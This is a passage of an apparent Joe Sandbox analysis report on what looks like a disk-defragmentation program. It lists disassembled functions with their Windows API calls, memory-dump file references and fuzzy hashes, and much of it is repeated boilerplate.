                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Path$CreateDirectoryExistsFileFolderSpecial
                                                                                                                                                                                                                                                                                                • String ID: DiskDefrag$\DiskDefrag
                                                                                                                                                                                                                                                                                                • API String ID: 106629909-1352560241
                                                                                                                                                                                                                                                                                                • Opcode ID: a2d3dbced54b8fdd5c0ae5b42ab46fad3f2ef9f23a5d0fc133a43e43219cb9af
                                                                                                                                                                                                                                                                                                • Instruction ID: 938fb3785b8e758ab9aa55aacaf13088161b2d62692eeac53cc892e3a5652775
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a2d3dbced54b8fdd5c0ae5b42ab46fad3f2ef9f23a5d0fc133a43e43219cb9af
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CE4195B16083019BD300EF65DD85AABB7E4FF98714F00453EF54AD2290EB349949CBAB
                                                                                                                                                                                                                                                                                                Function 00465E00 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ObjectSelect
                                                                                                                                                                                                                                                                                                • String ID: `=
                                                                                                                                                                                                                                                                                                • API String ID: 1517587568-2762138152
                                                                                                                                                                                                                                                                                                • Opcode ID: 116e8130f725741a0df8cffd76ef37318a9139d2394634156b2cf1340f76da15
                                                                                                                                                                                                                                                                                                • Instruction ID: 398bc34aaeb48a28786a3eeef8d096b9ba9882d646282afc346b5bddce66a1f9
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 116e8130f725741a0df8cffd76ef37318a9139d2394634156b2cf1340f76da15
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 36417E32200A048FD724EFA9E884E6BF3A5EF94321B05852FE84A97611DB35F840CB55
                                                                                                                                                                                                                                                                                                Function 0041E180 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • LoadLibraryW.KERNEL32(PowrProf.dll,00000001,?,0042198D,00000002), ref: 0041E189
                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SetSuspendState), ref: 0041E19B
                                                                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 0041E1B7
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                                                                • String ID: PowrProf.dll$SetSuspendState
                                                                                                                                                                                                                                                                                                • API String ID: 145871493-1420736420
                                                                                                                                                                                                                                                                                                • Opcode ID: cc42e22b2c3cdccf1d52a58f3ef6048082fefe304da44aace1865287b01325bc
                                                                                                                                                                                                                                                                                                • Instruction ID: 1295b46436a6d6ef84abe92a3e8f017b2096165fdcf3e5832b2fc3faa33b59df
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cc42e22b2c3cdccf1d52a58f3ef6048082fefe304da44aace1865287b01325bc
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E2E04F357012606B527117366C48D9F2A68DFC1B91349467EF819D1294DF38C9828AAA
                                                                                                                                                                                                                                                                                                Function 004657C0 Relevance: 7.6, APIs: 5, Instructions: 145COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00467820: DeleteObject.GDI32(00000000), ref: 00467935
                                                                                                                                                                                                                                                                                                • GdiplusShutdown.GDIPLUS(?,?,1088D068,00093C38,?,?,00093E00,?,00000000,0047812F,000000FF,0041A4F1,1088D068,00093C38,?,00093E00), ref: 00465814
                                                                                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 004658CF
                                                                                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 00465921
                                                                                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 00465973
                                                                                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 004659C5
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: DeleteObject$GdiplusShutdown
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 1337965791-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 3a50086e46136d6d50168286cddb443a9cc0a0107472165b4ab84f4d896fe486
                                                                                                                                                                                                                                                                                                • Instruction ID: 5b8780734ed73be5f4f2893b0bea8a6c3b62fc8eaf033f1e837d6edea0f0e4aa
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3a50086e46136d6d50168286cddb443a9cc0a0107472165b4ab84f4d896fe486
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8361E6B0505F409FC360DF3A9880B9BFBE4BB48305F90492EE1AE93241DB796548CF5A
                                                                                                                                                                                                                                                                                                Function 00454C60 Relevance: 7.6, APIs: 5, Instructions: 104COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: __aullrem$__aulldiv
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3670715282-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 9c34d576a32de794e1e0b0d0fca0d0e7c205ee0b047ab4e09ce85ba4a67a3df8
                                                                                                                                                                                                                                                                                                • Instruction ID: fa94849079e70c1b34915df37323d6afc94868806176a113829b563514bd0fbf
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9c34d576a32de794e1e0b0d0fca0d0e7c205ee0b047ab4e09ce85ba4a67a3df8
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 43311775208305AFD200EA65E881D2FB3E9EBC8749F50491EF98497302D738FD498AB6
                                                                                                                                                                                                                                                                                                Function 004262A0 Relevance: 7.6, APIs: 5, Instructions: 74stringCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(0041F6D0,?,75A85540,?,?,0041F6D0,00000000,?,00000000,03E80000,?,00000000,?,DiskDefrag,DiskCheckMask,00000000), ref: 004262B5
                                                                                                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,75A85540,00000001,00000000,?,00000000,00000000,?,75A85540,?,?,0041F6D0,00000000,?,00000000), ref: 004262E1
                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,75A85540,?,?,0041F6D0,00000000,?,00000000,03E80000,?,00000000,?,DiskDefrag,DiskCheckMask,00000000,?), ref: 004262F2
                                                                                                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,75A85540,00000001,00000000,00000000,00000000,00000000,?,75A85540,?,?,0041F6D0,00000000,?,00000000), ref: 0042630F
                                                                                                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,75A85540,00000001,00000000,00000000,00000000,00000000,?,75A85540,?,?,0041F6D0,00000000,?,00000000), ref: 00426330
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ByteCharMultiWide$ErrorLastlstrlen
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3322701435-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 406f029fa45b1055b96b03b8e5df20f9be275f8369c24922fb13ea929e72a033
                                                                                                                                                                                                                                                                                                • Instruction ID: cb33d9e4ec5480741093735bde79ecc2fcd6722e1911622dc14afd3accb78fd4
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 406f029fa45b1055b96b03b8e5df20f9be275f8369c24922fb13ea929e72a033
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3E1191713803156BE220AFA4ECC6F27769CD745B04F61083DFB45AA2C1D5A47C448668
                                                                                                                                                                                                                                                                                                Function 0041A0DC Relevance: 7.6, APIs: 5, Instructions: 65windowCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041A7E0: RegOpenKeyW.ADVAPI32(80000002,SYSTEM\CurrentControlSet\services\BootDefrag), ref: 0041A7F7
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041A730: CreateMutexW.KERNEL32(00000000,00000000,{4391F12D-936B-4037-9383-DCB800DF7B65}), ref: 0041A742
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041A7B0: CloseHandle.KERNEL32(?,0041A113), ref: 0041A7BB
                                                                                                                                                                                                                                                                                                • EnumWindows.USER32(Function_00019F90,?), ref: 0041A121
                                                                                                                                                                                                                                                                                                • IsWindow.USER32(?), ref: 0041A12C
                                                                                                                                                                                                                                                                                                • SetForegroundWindow.USER32(?), ref: 0041A13F
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0041A157
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32 ref: 0041A18A
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MessageSendWindow$CloseCreateEnumForegroundHandleMutexOpenWindows
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 4196083293-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 9e6c0fe9baec171d7626c0c65e47d53d225f7aa6f943c70b518a3cd763a0f699
                                                                                                                                                                                                                                                                                                • Instruction ID: d762d58b284716c123194df2d56f313edae6d07df6750aca61f6228c44254caf
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9e6c0fe9baec171d7626c0c65e47d53d225f7aa6f943c70b518a3cd763a0f699
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 58218E71609341AFC315DF15D885AABBBE8FFC8304F00492EF14983291DB79E885CB56
                                                                                                                                                                                                                                                                                                Function 0040F280 Relevance: 7.6, APIs: 5, Instructions: 58COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Rect$Client$EventMouseTrack
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 1879027383-0
